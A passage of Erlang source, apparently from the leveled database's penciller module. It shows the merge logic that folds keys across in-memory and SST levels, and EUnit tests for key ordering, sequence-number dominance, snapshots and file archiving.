            {SegmentList, LastModRange, MaxKeys}) ->
    {StartKey, EndKey} = KeyRange,
    % NOTE(review): only {false, _} results are matched below, so IMMKey is
    % assumed to be >= StartKey (filtered upstream) - a key before the start
    % of the range would crash here; confirm against callers
    case {IMMKey < StartKey, leveled_codec:endkey_passed(EndKey, IMMKey)} of
        {false, true} ->
            % There are no more keys in-range in the in-memory
            % iterator, so take action as if this iterator is empty
            % (see above)
            keyfolder({[], SSTiterator},
                        KeyRange,
                        {AccFun, Acc, Now},
                        {SegmentList, LastModRange, MaxKeys});
        {false, false} ->
            case find_nextkey(SSTiterator, StartKey, EndKey,
                                SegmentList, element(1, LastModRange)) of
                no_more_keys ->
                    % No more keys in range in the persisted store, so use the
                    % in-memory KV as the next
                    {Acc1, MK1} =
                        maybe_accumulate(IMMKey, IMMVal,
                                            {Acc, AccFun, Now},
                                            MaxKeys, LastModRange),
                    keyfolder({NxIMMiterator,
                                    []},
                                KeyRange,
                                {AccFun, Acc1, Now},
                                {SegmentList, LastModRange, MK1});
                {NxSSTiterator, {SSTKey, SSTVal}} ->
                    % There is a next key, so need to know which is the
                    % next key between the two (and handle two keys
                    % with different sequence numbers).
                    case leveled_codec:key_dominates({IMMKey,
                                                            IMMVal},
                                                        {SSTKey,
                                                            SSTVal}) of
                        left_hand_first ->
                            {Acc1, MK1} =
                                maybe_accumulate(IMMKey, IMMVal,
                                                    {Acc, AccFun, Now},
                                                    MaxKeys, LastModRange),
                            % Stow the previous best result away at Level -1
                            % so that there is no need to iterate to it again
                            NewEntry = {-1, [{SSTKey, SSTVal}]},
                            keyfolder({NxIMMiterator,
                                            lists:keystore(-1,
                                                            1,
                                                            NxSSTiterator,
                                                            NewEntry)},
                                        KeyRange,
                                        {AccFun, Acc1, Now},
                                        {SegmentList, LastModRange, MK1});
                        right_hand_first ->
                            {Acc1, MK1} =
                                maybe_accumulate(SSTKey, SSTVal,
                                                    {Acc, AccFun, Now},
                                                    MaxKeys, LastModRange),
                            keyfolder({[{IMMKey, IMMVal}|NxIMMiterator],
                                            NxSSTiterator},
                                        KeyRange,
                                        {AccFun, Acc1, Now},
                                        {SegmentList, LastModRange, MK1});
                        left_hand_dominant ->
                            {Acc1, MK1} =
                                maybe_accumulate(IMMKey, IMMVal,
                                                    {Acc, AccFun, Now},
                                                    MaxKeys, LastModRange),
                            % We can add to the accumulator here.  As the SST
                            % key was the most dominant across all SST levels,
                            % so there is no need to hold off until the IMMKey
                            % is left hand first.
                            keyfolder({NxIMMiterator,
                                            NxSSTiterator},
                                        KeyRange,
                                        {AccFun, Acc1, Now},
                                        {SegmentList, LastModRange, MK1})
                    end
            end
    end.
-spec maybe_accumulate(leveled_codec:ledger_key(),
                        leveled_codec:ledger_value(),
                        {any(), pclacc_fun(), pos_integer()},
                        integer(),
                        {non_neg_integer(), non_neg_integer()|infinity})
                            -> any().
%% @doc
%% Make an accumulation decision based on the last-modified date range:
%% apply the fold fun (decrementing the key count) only when the entry is
%% active and its last-modified date is within range (or undefined).
maybe_accumulate(LK, LV,
                    {Acc, AccFun, QueryStartTime},
                    MaxKeys,
                    {LowLastMod, HighLastMod}) ->
    {_SQN, _SH, LMD} = leveled_codec:strip_to_indexdetails({LK, LV}),
    InModRange =
        (LMD == undefined) or
        ((LMD >= LowLastMod) and (LMD =< HighLastMod)),
    case InModRange and leveled_codec:is_active(LK, LV, QueryStartTime) of
        false ->
            {Acc, MaxKeys};
        true ->
            {AccFun(LK, LV, Acc), MaxKeys - 1}
    end.
-spec find_nextkey(iterator(),
                    leveled_codec:ledger_key(), leveled_codec:ledger_key()) ->
                        no_more_keys|{iterator(), leveled_codec:ledger_kv()}.
%% @doc
%% Looks to find the best choice for the next key across the levels (other
%% than in-memory table)
%% In finding the best choice, the next key in a given level may be a next
%% block or next file pointer which will need to be expanded
find_nextkey(QueryArray, StartKey, EndKey) ->
    find_nextkey(QueryArray, StartKey, EndKey, false, 0).

find_nextkey(QueryArray, StartKey, EndKey, SegmentList, LowLastMod) ->
    % Start the scan at level -1 (the stow level used by keyfolder) with
    % no best key yet chosen
    find_nextkey(QueryArray,
                    -1,
                    {null, null},
                    StartKey, EndKey,
                    SegmentList,
                    LowLastMod,
                    ?ITERATOR_SCANWIDTH).

find_nextkey(_QueryArray, LCnt,
                {null, null},
                _StartKey, _EndKey,
                _SegList, _LowLastMod, _Width) when LCnt > ?MAX_LEVELS ->
    % The array has been scanned without finding a best key - must be
    % exhausted - respond to indicate no more keys to be found by the
    % iterator
    no_more_keys;
find_nextkey(QueryArray, LCnt,
                {BKL, BestKV},
                _StartKey, _EndKey,
                _SegList, _LowLastMod, _Width) when LCnt > ?MAX_LEVELS ->
    % All levels have been scanned, so need to remove the best result from
    % the array, and return that array along with the best key/sqn/status
    % combination
    {BKL, [BestKV|Tail]} = lists:keyfind(BKL, 1, QueryArray),
    {lists:keyreplace(BKL, 1, QueryArray, {BKL, Tail}), BestKV};
find_nextkey(QueryArray, LCnt,
                {BestKeyLevel, BestKV},
                StartKey, EndKey,
                SegList, LowLastMod, Width) ->
    % Get the next key at this level
    {NextKey, RestOfKeys} =
        case lists:keyfind(LCnt, 1, QueryArray) of
            false ->
                {null, null};
            {LCnt, []} ->
                {null, null};
            {LCnt, [NK|ROfKs]} ->
                {NK, ROfKs}
        end,
    % Compare the next key at this level with the best key
    case {NextKey, BestKeyLevel, BestKV} of
        {null, BKL, BKV} ->
            % There is no key at this level - go to the next level
            find_nextkey(QueryArray,
                            LCnt + 1,
                            {BKL, BKV},
                            StartKey, EndKey,
                            SegList, LowLastMod, Width);
        {{next, Owner, _SK}, BKL, BKV} ->
            % The first key at this level is pointer to a file - need to query
            % the file to expand this level out before proceeding
            Pointer = {next, Owner, StartKey, EndKey},
            UpdList = leveled_sst:sst_expandpointer(Pointer,
                                                        RestOfKeys,
                                                        Width,
                                                        SegList,
                                                        LowLastMod),
            NewEntry = {LCnt, UpdList},
            % Need to loop around at this level (LCnt) as we have not yet
            % examined a real key at this level
            find_nextkey(lists:keyreplace(LCnt, 1, QueryArray, NewEntry),
                            LCnt,
                            {BKL, BKV},
                            StartKey, EndKey,
                            SegList, LowLastMod, Width);
        {{pointer, SSTPid, Slot, PSK, PEK}, BKL, BKV} ->
            % The first key at this level is pointer within a file - need to
            % query the file to expand this level out before proceeding
            Pointer = {pointer, SSTPid, Slot, PSK, PEK},
            UpdList = leveled_sst:sst_expandpointer(Pointer,
                                                        RestOfKeys,
                                                        Width,
                                                        SegList,
                                                        LowLastMod),
            NewEntry = {LCnt, UpdList},
            % Need to loop around at this level (LCnt) as we have not yet
            % examined a real key at this level
            find_nextkey(lists:keyreplace(LCnt, 1, QueryArray, NewEntry),
                            LCnt,
                            {BKL, BKV},
                            StartKey, EndKey,
                            SegList, LowLastMod, Width);
        {{Key, Val}, null, null} ->
            % No best key set - so can assume that this key is the best key,
            % and check the lower levels
            find_nextkey(QueryArray,
                            LCnt + 1,
                            {LCnt, {Key, Val}},
                            StartKey, EndKey,
                            SegList, LowLastMod, Width);
        {{Key, Val}, _BKL, {BestKey, _BestVal}} when Key < BestKey ->
            % There is a real key and a best key to compare, and the real key
            % at this level is before the best key, and so is now the new best
            % key
            % The QueryArray is not modified until we have checked all levels
            find_nextkey(QueryArray,
                            LCnt + 1,
                            {LCnt, {Key, Val}},
                            StartKey, EndKey,
                            SegList, LowLastMod, Width);
        {{Key, Val}, BKL, {BestKey, BestVal}} when Key == BestKey ->
            % Same key at two levels - resolve by sequence number
            SQN = leveled_codec:strip_to_seqonly({Key, Val}),
            BestSQN = leveled_codec:strip_to_seqonly({BestKey, BestVal}),
            if
                SQN =< BestSQN ->
                    % This is a dominated key, so we need to skip over it
                    NewQArray = lists:keyreplace(LCnt,
                                                    1,
                                                    QueryArray,
                                                    {LCnt, RestOfKeys}),
                    find_nextkey(NewQArray,
                                    LCnt + 1,
                                    {BKL, {BestKey, BestVal}},
                                    StartKey, EndKey,
                                    SegList, LowLastMod, Width);
                SQN > BestSQN ->
                    % There is a real key at the front of this level and it has
                    % a higher SQN than the best key, so we should use this as
                    % the best key
                    % But we also need to remove the dominated key from the
                    % lower level in the query array
                    OldBestEntry = lists:keyfind(BKL, 1, QueryArray),
                    {BKL, [{BestKey, BestVal}|BestTail]} = OldBestEntry,
                    find_nextkey(lists:keyreplace(BKL,
                                                    1,
                                                    QueryArray,
                                                    {BKL, BestTail}),
                                    LCnt + 1,
                                    {LCnt, {Key, Val}},
                                    StartKey, EndKey,
                                    SegList, LowLastMod, Width)
            end;
        {_, BKL, BKV} ->
            % This is not the best key
            find_nextkey(QueryArray,
                            LCnt + 1,
                            {BKL, BKV},
                            StartKey, EndKey,
                            SegList, LowLastMod, Width)
    end.
-spec maybelog_fetch_timing(
    leveled_monitor:monitor(),
    memory|leveled_pmanifest:lsm_level(),
    leveled_monitor:timing(),
    boolean()) -> ok.
%% @doc
%% Push fetch timing stats to the monitor.  A no_timing result is a no-op;
%% not-found results (final boolean true) are logged against the not_found
%% category instead of the level at which the search terminated.
maybelog_fetch_timing(_Monitor, _Level, no_timing, _NF) ->
    ok;
maybelog_fetch_timing({Pid, _StatsFreq}, _Level, FetchTime, true) ->
    leveled_monitor:add_stat(Pid, {pcl_fetch_update, not_found, FetchTime});
maybelog_fetch_timing({Pid, _StatsFreq}, Level, FetchTime, _NF) ->
    leveled_monitor:add_stat(Pid, {pcl_fetch_update, Level, FetchTime}).
%%%============================================================================
%%% Test
%%%============================================================================
-ifdef(TEST).
%% Build Count random ledger KVs with ascending SQNs starting at StartSQN
generate_randomkeys({Count, StartSQN}) ->
    generate_randomkeys(Count, StartSQN, []).

generate_randomkeys(0, _SQN, Acc) ->
    lists:reverse(Acc);
generate_randomkeys(Count, SQN, Acc) ->
    Bucket = lists:concat(["Bucket", leveled_rand:uniform(1024)]),
    KeyName = lists:concat(["Key", leveled_rand:uniform(1024)]),
    LK = {o, Bucket, KeyName, null},
    LV = {SQN, {active, infinity}, leveled_codec:segment_hash(LK), null},
    generate_randomkeys(Count - 1, SQN + 1, [{LK, LV}|Acc]).
%% Remove all files from the ledger's SST and manifest test directories
clean_testdir(RootPath) ->
    clean_subdir(sst_rootpath(RootPath)),
    clean_subdir(filename:join(RootPath, ?MANIFEST_FP)).
%% Delete every file in DirPath (if it is a directory), logging each
%% deletion; a non-existent directory is a no-op.
clean_subdir(DirPath) ->
    case filelib:is_dir(DirPath) of
        false ->
            ok;
        true ->
            {ok, Files} = file:list_dir(DirPath),
            DeleteFun =
                fun(FN) ->
                    File = filename:join(DirPath, FN),
                    ok = file:delete(File),
                    io:format("Success deleting ~s~n", [File])
                end,
            lists:foreach(DeleteFun, Files)
    end.
%% Test helper: push a list of ledger KVs into the penciller, first
%% converting to the bookie-cache shape {Tree, Index, MinSQN, MaxSQN};
%% retry after a short sleep if the penciller responds `returned`.
maybe_pause_push(PCL, KL) ->
    T0 = [],
    I0 = leveled_pmem:new_index(),
    T1 = lists:foldl(fun({K, V}, {AccSL, AccIdx, MinSQN, MaxSQN}) ->
                            UpdSL = [{K, V}|AccSL],
                            SQN = leveled_codec:strip_to_seqonly({K, V}),
                            H = leveled_codec:segment_hash(K),
                            UpdIdx = leveled_pmem:prepare_for_index(AccIdx, H),
                            {UpdSL, UpdIdx, min(SQN, MinSQN), max(SQN, MaxSQN)}
                        end,
                        {T0, I0, infinity, 0},
                        KL),
    SL = element(1, T1),
    Tree = leveled_tree:from_orderedlist(lists:ukeysort(1, SL), ?CACHE_TYPE),
    T2 = setelement(1, T1, Tree),
    case pcl_pushmem(PCL, T2) of
        returned ->
            % L0 roll pending - wait and retry the whole push
            timer:sleep(50),
            maybe_pause_push(PCL, KL);
        ok ->
            ok
    end.
%% old test data doesn't have the magic hash - inject the segment hash so
%% the ledger value matches the current {SQN, Status, Hash, MD} format
add_missing_hash({K, {SQN, ST, MD}}) ->
    {K, {SQN, ST, leveled_codec:segment_hash(K), MD}}.
%% Unused .sst files should be renamed to the archive extension (.bak);
%% used .sst files and files with other extensions are left untouched.
archive_files_test() ->
    RootPath = "test/test_area/ledger",
    SSTPath = sst_rootpath(RootPath),
    ok = filelib:ensure_dir(SSTPath),
    ok = file:write_file(SSTPath ++ "/test1.sst", "hello_world"),
    ok = file:write_file(SSTPath ++ "/test2.sst", "hello_world"),
    ok = file:write_file(SSTPath ++ "/test3.bob", "hello_world"),
    UsedFiles = ["./test1.sst"],
    ok = archive_files(RootPath, UsedFiles),
    {ok, AllFiles} = file:list_dir(SSTPath),
    ?assertMatch(true, lists:member("test1.sst", AllFiles)),
    ?assertMatch(false, lists:member("test2.sst", AllFiles)),
    ?assertMatch(true, lists:member("test3.bob", AllFiles)),
    ?assertMatch(true, lists:member("test2.bak", AllFiles)),
    ok = clean_subdir(SSTPath).
%% Poll (up to 100 times, 200ms apart) until the penciller reports no
%% outstanding compaction work, then close it.
shutdown_when_compact(Pid) ->
    FoldFun =
        fun(_I, Ready) ->
            case Ready of
                true ->
                    true;
                false ->
                    timer:sleep(200),
                    not pcl_checkforwork(Pid)
            end
        end,
    true = lists:foldl(FoldFun, false, lists:seq(1, 100)),
    io:format("No outstanding compaction work for ~w~n", [Pid]),
    pcl_close(Pid).
%% format_status/2 should redact the bulky in-memory structures
%% (manifest and the level-zero cache/index/astree) when a status
%% report is produced on terminate, so crash logs are not flooded.
format_status_test() ->
    RootPath = "test/test_area/ledger",
    clean_testdir(RootPath),
    {ok, PCL} =
        pcl_start(#penciller_options{root_path=RootPath,
                                        max_inmemory_tablesize=1000,
                                        sst_options=#sst_options{}}),
    {status, PCL, {module, gen_server}, SItemL} = sys:get_status(PCL),
    S = lists:keyfind(state, 1, lists:nth(5, SItemL)),
    %% Sanity check: the live state holds a real (array-backed) manifest
    true = is_integer(array:size(element(2, S#state.manifest))),
    ST = format_status(terminate, [dict:new(), S]),
    %% All large fields must have been replaced by the atom 'redacted'
    ?assertMatch(redacted, ST#state.manifest),
    ?assertMatch(redacted, ST#state.levelzero_cache),
    ?assertMatch(redacted, ST#state.levelzero_index),
    ?assertMatch(redacted, ST#state.levelzero_astree),
    clean_testdir(RootPath).
%% End-to-end exercise of the penciller: push keys and bulk loads,
%% fetch them back, check the blooms, restart the penciller (confirming
%% the persisted startup SQN), then snapshot the store and confirm that
%% an old snapshot keeps seeing the old version of a key after it has
%% been replaced, while a fresh snapshot sees the replacement.
%%
%% NOTE: two comment lines in this function had lost their '%' markers
%% (leaving invalid syntax) - restored below.
simple_server_test() ->
    RootPath = "test/test_area/ledger",
    clean_testdir(RootPath),
    {ok, PCL} =
        pcl_start(#penciller_options{root_path=RootPath,
                                        max_inmemory_tablesize=1000,
                                        sst_options=#sst_options{}}),
    Key1_Pre = {{o,"Bucket0001", "Key0001", null},
                    {1, {active, infinity}, null}},
    Key1 = add_missing_hash(Key1_Pre),
    KL1 = generate_randomkeys({1000, 2}),
    Key2_Pre = {{o,"Bucket0002", "Key0002", null},
                    {1002, {active, infinity}, null}},
    Key2 = add_missing_hash(Key2_Pre),
    KL2 = generate_randomkeys({900, 1003}),
    % Keep below the table size by having 900 not 1000
    Key3_Pre = {{o,"Bucket0003", "Key0003", null},
                    {2003, {active, infinity}, null}},
    Key3 = add_missing_hash(Key3_Pre),
    KL3 = generate_randomkeys({1000, 2004}),
    Key4_Pre = {{o,"Bucket0004", "Key0004", null},
                    {3004, {active, infinity}, null}},
    Key4 = add_missing_hash(Key4_Pre),
    KL4 = generate_randomkeys({1000, 3005}),
    ok = maybe_pause_push(PCL, [Key1]),
    ?assertMatch(Key1, pcl_fetch(PCL, {o,"Bucket0001", "Key0001", null})),
    ok = maybe_pause_push(PCL, KL1),
    ?assertMatch(Key1, pcl_fetch(PCL, {o,"Bucket0001", "Key0001", null})),
    ok = maybe_pause_push(PCL, [Key2]),
    ?assertMatch(Key1, pcl_fetch(PCL, {o,"Bucket0001", "Key0001", null})),
    ?assertMatch(Key2, pcl_fetch(PCL, {o,"Bucket0002", "Key0002", null})),
    ok = maybe_pause_push(PCL, KL2),
    ?assertMatch(Key2, pcl_fetch(PCL, {o,"Bucket0002", "Key0002", null})),
    ok = maybe_pause_push(PCL, [Key3]),
    ?assertMatch(Key1, pcl_fetch(PCL, {o,"Bucket0001", "Key0001", null})),
    ?assertMatch(Key2, pcl_fetch(PCL, {o,"Bucket0002", "Key0002", null})),
    ?assertMatch(Key3, pcl_fetch(PCL, {o,"Bucket0003", "Key0003", null})),
    true = pcl_checkbloomtest(PCL, {o,"Bucket0001", "Key0001", null}),
    true = pcl_checkbloomtest(PCL, {o,"Bucket0002", "Key0002", null}),
    true = pcl_checkbloomtest(PCL, {o,"Bucket0003", "Key0003", null}),
    false = pcl_checkbloomtest(PCL, {o,"Bucket9999", "Key9999", null}),
    ok = shutdown_when_compact(PCL),
    %% Restart and confirm the persisted state survived the shutdown
    {ok, PCLr} =
        pcl_start(#penciller_options{root_path=RootPath,
                                        max_inmemory_tablesize=1000,
                                        sst_options=#sst_options{}}),
    ?assertMatch(2003, pcl_getstartupsequencenumber(PCLr)),
    % ok = maybe_pause_push(PCLr, [Key2] ++ KL2 ++ [Key3]),
    true = pcl_checkbloomtest(PCLr, {o,"Bucket0001", "Key0001", null}),
    true = pcl_checkbloomtest(PCLr, {o,"Bucket0002", "Key0002", null}),
    true = pcl_checkbloomtest(PCLr, {o,"Bucket0003", "Key0003", null}),
    false = pcl_checkbloomtest(PCLr, {o,"Bucket9999", "Key9999", null}),
    ?assertMatch(Key1, pcl_fetch(PCLr, {o,"Bucket0001", "Key0001", null})),
    ?assertMatch(Key2, pcl_fetch(PCLr, {o,"Bucket0002", "Key0002", null})),
    ?assertMatch(Key3, pcl_fetch(PCLr, {o,"Bucket0003", "Key0003", null})),
    ok = maybe_pause_push(PCLr, KL3),
    ok = maybe_pause_push(PCLr, [Key4]),
    ok = maybe_pause_push(PCLr, KL4),
    ?assertMatch(Key1, pcl_fetch(PCLr, {o,"Bucket0001", "Key0001", null})),
    ?assertMatch(Key2, pcl_fetch(PCLr, {o,"Bucket0002", "Key0002", null})),
    ?assertMatch(Key3, pcl_fetch(PCLr, {o,"Bucket0003", "Key0003", null})),
    ?assertMatch(Key4, pcl_fetch(PCLr, {o,"Bucket0004", "Key0004", null})),
    {ok, PclSnap, null} =
        leveled_bookie:snapshot_store(
            leveled_bookie:empty_ledgercache(),
            PCLr,
            null,
            {no_monitor, 0},
            ledger,
            undefined,
            false),
    ?assertMatch(Key1, pcl_fetch(PclSnap, {o,"Bucket0001", "Key0001", null})),
    ?assertMatch(Key2, pcl_fetch(PclSnap, {o,"Bucket0002", "Key0002", null})),
    ?assertMatch(Key3, pcl_fetch(PclSnap, {o,"Bucket0003", "Key0003", null})),
    ?assertMatch(Key4, pcl_fetch(PclSnap, {o,"Bucket0004", "Key0004", null})),
    ?assertMatch(current, pcl_checksequencenumber(PclSnap,
                                                    {o,
                                                        "Bucket0001",
                                                        "Key0001",
                                                        null},
                                                    1)),
    ?assertMatch(current, pcl_checksequencenumber(PclSnap,
                                                    {o,
                                                        "Bucket0002",
                                                        "Key0002",
                                                        null},
                                                    1002)),
    ?assertMatch(current, pcl_checksequencenumber(PclSnap,
                                                    {o,
                                                        "Bucket0003",
                                                        "Key0003",
                                                        null},
                                                    2003)),
    ?assertMatch(current, pcl_checksequencenumber(PclSnap,
                                                    {o,
                                                        "Bucket0004",
                                                        "Key0004",
                                                        null},
                                                    3004)),
    % Add some more keys and confirm that check sequence number still
    % sees the old version in the previous snapshot, but will see the new
    % version in a new snapshot
    Key1A_Pre = {{o,"Bucket0001", "Key0001", null},
                    {4005, {active, infinity}, null}},
    Key1A = add_missing_hash(Key1A_Pre),
    KL1A = generate_randomkeys({2000, 4006}),
    ok = maybe_pause_push(PCLr, [Key1A]),
    ok = maybe_pause_push(PCLr, KL1A),
    ?assertMatch(current, pcl_checksequencenumber(PclSnap,
                                                    {o,
                                                        "Bucket0001",
                                                        "Key0001",
                                                        null},
                                                    1)),
    ok = pcl_close(PclSnap),
    {ok, PclSnap2, null} =
        leveled_bookie:snapshot_store(
            leveled_bookie:empty_ledgercache(),
            PCLr,
            null,
            {no_monitor, 0},
            ledger,
            undefined,
            false),
    %% The fresh snapshot sees SQN 1 as replaced, SQN 4005 as current
    ?assertMatch(replaced, pcl_checksequencenumber(PclSnap2,
                                                    {o,
                                                        "Bucket0001",
                                                        "Key0001",
                                                        null},
                                                    1)),
    ?assertMatch(current, pcl_checksequencenumber(PclSnap2,
                                                    {o,
                                                        "Bucket0001",
                                                        "Key0001",
                                                        null},
                                                    4005)),
    ?assertMatch(current, pcl_checksequencenumber(PclSnap2,
                                                    {o,
                                                        "Bucket0002",
                                                        "Key0002",
                                                        null},
                                                    1002)),
    ok = pcl_close(PclSnap2),
    ok = pcl_close(PCLr),
    clean_testdir(RootPath).
%% find_nextkey/3 should return keys from the query array one at a
%% time in key order (regardless of level), and then no_more_keys once
%% the array is exhausted.
simple_findnextkey_test() ->
    QueryArray = [
        {2, [{{o, "Bucket1", "Key1", null}, {5, {active, infinity}, {0, 0}, null}},
            {{o, "Bucket1", "Key5", null}, {4, {active, infinity}, {0, 0}, null}}]},
        {3, [{{o, "Bucket1", "Key3", null}, {3, {active, infinity}, {0, 0}, null}}]},
        {5, [{{o, "Bucket1", "Key2", null}, {2, {active, infinity}, {0, 0}, null}}]}
    ],
    SK = {o, "Bucket1", "Key0", null},
    EK = {o, "Bucket1", "Key5", null},
    {QA1, KV1} = find_nextkey(QueryArray, SK, EK),
    ?assertMatch({{o, "Bucket1", "Key1", null},
                    {5, {active, infinity}, {0, 0}, null}},
                KV1),
    {QA2, KV2} = find_nextkey(QA1, SK, EK),
    ?assertMatch({{o, "Bucket1", "Key2", null},
                    {2, {active, infinity}, {0, 0}, null}},
                KV2),
    {QA3, KV3} = find_nextkey(QA2, SK, EK),
    ?assertMatch({{o, "Bucket1", "Key3", null},
                    {3, {active, infinity}, {0, 0}, null}},
                KV3),
    {QA4, KV4} = find_nextkey(QA3, SK, EK),
    ?assertMatch({{o, "Bucket1", "Key5", null},
                    {4, {active, infinity}, {0, 0}, null}},
                KV4),
    ?assertMatch(no_more_keys, find_nextkey(QA4, SK, EK)).
%% Key5 exists at both level 2 (SQN 4) and level 5 (SQN 2):
%% find_nextkey/3 should return only the dominant (higher SQN)
%% version, and each distinct key exactly once.
sqnoverlap_findnextkey_test() ->
    QueryArray = [
        {2, [{{o, "Bucket1", "Key1", null}, {5, {active, infinity}, {0, 0}, null}},
            {{o, "Bucket1", "Key5", null}, {4, {active, infinity}, {0, 0}, null}}]},
        {3, [{{o, "Bucket1", "Key3", null}, {3, {active, infinity}, {0, 0}, null}}]},
        {5, [{{o, "Bucket1", "Key5", null}, {2, {active, infinity}, {0, 0}, null}}]}
    ],
    SK = {o, "Bucket1", "Key0", null},
    EK = {o, "Bucket1", "Key5", null},
    {QA1, KV1} = find_nextkey(QueryArray, SK, EK),
    ?assertMatch({{o, "Bucket1", "Key1", null},
                    {5, {active, infinity}, {0, 0}, null}},
                KV1),
    {QA2, KV2} = find_nextkey(QA1, SK, EK),
    ?assertMatch({{o, "Bucket1", "Key3", null},
                    {3, {active, infinity}, {0, 0}, null}},
                KV2),
    {QA3, KV3} = find_nextkey(QA2, SK, EK),
    ?assertMatch({{o, "Bucket1", "Key5", null},
                    {4, {active, infinity}, {0, 0}, null}},
                KV3),
    ?assertMatch(no_more_keys, find_nextkey(QA3, SK, EK)).
%% As sqnoverlap_findnextkey_test/0 but with the duplicated Key5's
%% sequence numbers swapped the other way (level 2 holds SQN 1, level
%% 5 holds SQN 2): the SQN 2 version is the one expected back.
sqnoverlap_otherway_findnextkey_test() ->
    QueryArray = [
        {2, [{{o, "Bucket1", "Key1", null}, {5, {active, infinity}, {0, 0}, null}},
            {{o, "Bucket1", "Key5", null}, {1, {active, infinity}, {0, 0}, null}}]},
        {3, [{{o, "Bucket1", "Key3", null}, {3, {active, infinity}, {0, 0}, null}}]},
        {5, [{{o, "Bucket1", "Key5", null}, {2, {active, infinity}, {0, 0}, null}}]}
    ],
    SK = {o, "Bucket1", "Key0", null},
    EK = {o, "Bucket1", "Key5", null},
    {QA1, KV1} = find_nextkey(QueryArray, SK, EK),
    ?assertMatch({{o, "Bucket1", "Key1", null},
                    {5, {active, infinity}, {0, 0}, null}},
                KV1),
    {QA2, KV2} = find_nextkey(QA1, SK, EK),
    ?assertMatch({{o, "Bucket1", "Key3", null},
                    {3, {active, infinity}, {0, 0}, null}},
                KV2),
    {QA3, KV3} = find_nextkey(QA2, SK, EK),
    ?assertMatch({{o, "Bucket1", "Key5", null},
                    {2, {active, infinity}, {0, 0}, null}},
                KV3),
    ?assertMatch(no_more_keys, find_nextkey(QA3, SK, EK)).
%% keyfolder/5 merges an immutable in-memory iterator with the
%% persisted query array.  For keys present on both sides the
%% in-memory version wins (Key1 at SQN 8 beats the level-2 SQN 5
%% entry), and results come back in key order, bounded by the range.
foldwithimm_simple_test() ->
    Now = leveled_util:integer_now(),
    QueryArray = [
        {2, [{{o, "Bucket1", "Key1", null},
                    {5, {active, infinity}, 0, null}},
                {{o, "Bucket1", "Key5", null},
                    {1, {active, infinity}, 0, null}}]},
        {3, [{{o, "Bucket1", "Key3", null},
                {3, {active, infinity}, 0, null}}]},
        {5, [{{o, "Bucket1", "Key5", null},
                {2, {active, infinity}, 0, null}}]}
    ],
    KL1A = [{{o, "Bucket1", "Key6", null}, {7, {active, infinity}, 0, null}},
            {{o, "Bucket1", "Key1", null}, {8, {active, infinity}, 0, null}},
            {{o, "Bucket1", "Key8", null}, {9, {active, infinity}, 0, null}}],
    IMM2 = leveled_tree:from_orderedlist(lists:ukeysort(1, KL1A), ?CACHE_TYPE),
    IMMiter = leveled_tree:match_range({o, "Bucket1", "Key1", null},
                                        {o, null, null, null},
                                        IMM2),
    %% Accumulate {Key, SQN} pairs in the order the fold delivers them
    AccFun = fun(K, V, Acc) -> SQN = leveled_codec:strip_to_seqonly({K, V}),
                                Acc ++ [{K, SQN}] end,
    Acc = keyfolder(IMMiter,
                    QueryArray,
                    {o, "Bucket1", "Key1", null}, {o, "Bucket1", "Key6", null},
                    {AccFun, [], Now}),
    %% Key8 is beyond the end of the range so is not returned
    ?assertMatch([{{o, "Bucket1", "Key1", null}, 8},
                    {{o, "Bucket1", "Key3", null}, 3},
                    {{o, "Bucket1", "Key5", null}, 2},
                    {{o, "Bucket1", "Key6", null}, 7}], Acc),
    %% With only a single in-memory entry, the remaining results come
    %% from the query array alone
    IMMiterA = [{{o, "Bucket1", "Key1", null},
                    {8, {active, infinity}, 0, null}}],
    AccA = keyfolder(IMMiterA,
                        QueryArray,
                        {o, "Bucket1", "Key1", null},
                        {o, "Bucket1", "Key6", null},
                        {AccFun, [], Now}),
    ?assertMatch([{{o, "Bucket1", "Key1", null}, 8},
                    {{o, "Bucket1", "Key3", null}, 3},
                    {{o, "Bucket1", "Key5", null}, 2}], AccA),
    %% Add Key4 to the in-memory side only - it should be interleaved
    %% into the merged output in key order
    AddKV = {{o, "Bucket1", "Key4", null}, {10, {active, infinity}, 0, null}},
    KL1B = [AddKV|KL1A],
    IMM3 = leveled_tree:from_orderedlist(lists:ukeysort(1, KL1B), ?CACHE_TYPE),
    IMMiterB = leveled_tree:match_range({o, "Bucket1", "Key1", null},
                                        {o, null, null, null},
                                        IMM3),
    io:format("Compare IMM3 with QueryArrary~n"),
    AccB = keyfolder(IMMiterB,
                        QueryArray,
                        {o, "Bucket1", "Key1", null}, {o, "Bucket1", "Key6", null},
                        {AccFun, [], Now}),
    ?assertMatch([{{o, "Bucket1", "Key1", null}, 8},
                    {{o, "Bucket1", "Key3", null}, 3},
                    {{o, "Bucket1", "Key4", null}, 10},
                    {{o, "Bucket1", "Key5", null}, 2},
                    {{o, "Bucket1", "Key6", null}, 7}], AccB).
%% sst_newlevelzero/7 should build a level-zero SST file from the
%% passed cache and report its key range when ready.  A pre-existing
%% file at the target path ends up preserved with a .discarded
%% extension rather than destroyed (presumably set aside when the new
%% file is written - confirm in leveled_sst).
create_file_test() ->
    {RP, Filename} = {"test/test_area/", "new_file.sst"},
    %% Pre-seed a file at the target path to confirm it gets set aside
    ok = file:write_file(filename:join(RP, Filename), term_to_binary("hello")),
    KVL = lists:usort(generate_randomkeys({50000, 0})),
    Tree = leveled_tree:from_orderedlist(KVL, ?CACHE_TYPE),
    {ok, SP, noreply} =
        leveled_sst:sst_newlevelzero(RP,
                                        Filename,
                                        1,
                                        [Tree],
                                        undefined,
                                        50000,
                                        #sst_options{press_method = native}),
    {ok, SrcFN, StartKey, EndKey} = leveled_sst:sst_checkready(SP),
    io:format("StartKey ~w EndKey ~w~n", [StartKey, EndKey]),
    ?assertMatch({o, _, _, _}, StartKey),
    ?assertMatch({o, _, _, _}, EndKey),
    ?assertMatch("./new_file.sst", SrcFN),
    ok = leveled_sst:sst_clear(SP),
    %% The original file should have been moved aside, not deleted
    {ok, Bin} = file:read_file("test/test_area/new_file.sst.discarded"),
    ?assertMatch("hello", binary_to_term(Bin)).
%% log_slowfetch/5 must pass the fetched result through unchanged,
%% whether or not the key was found.
slow_fetch_test() ->
    lists:foreach(
        fun(Result) ->
            ?assertMatch(Result, log_slowfetch(2, Result, "fake", 0, 1))
        end,
        [not_present, "value"]).
%% Exercise otherwise-unreached gen_server callbacks purely for code
%% coverage - neither callback does meaningful work here.
coverage_cheat_test() ->
    {ok, _StateCC} = code_change(null, #state{}, null),
    {noreply, _StateTO} = handle_info(timeout, #state{}).
%% When the (fake) bookie process that took a snapshot dies, the
%% snapshot process should be taken down with it; while the bookie
%% remains alive the snapshot must stay up.
handle_down_test() ->
    RootPath = "test/test_area/ledger",
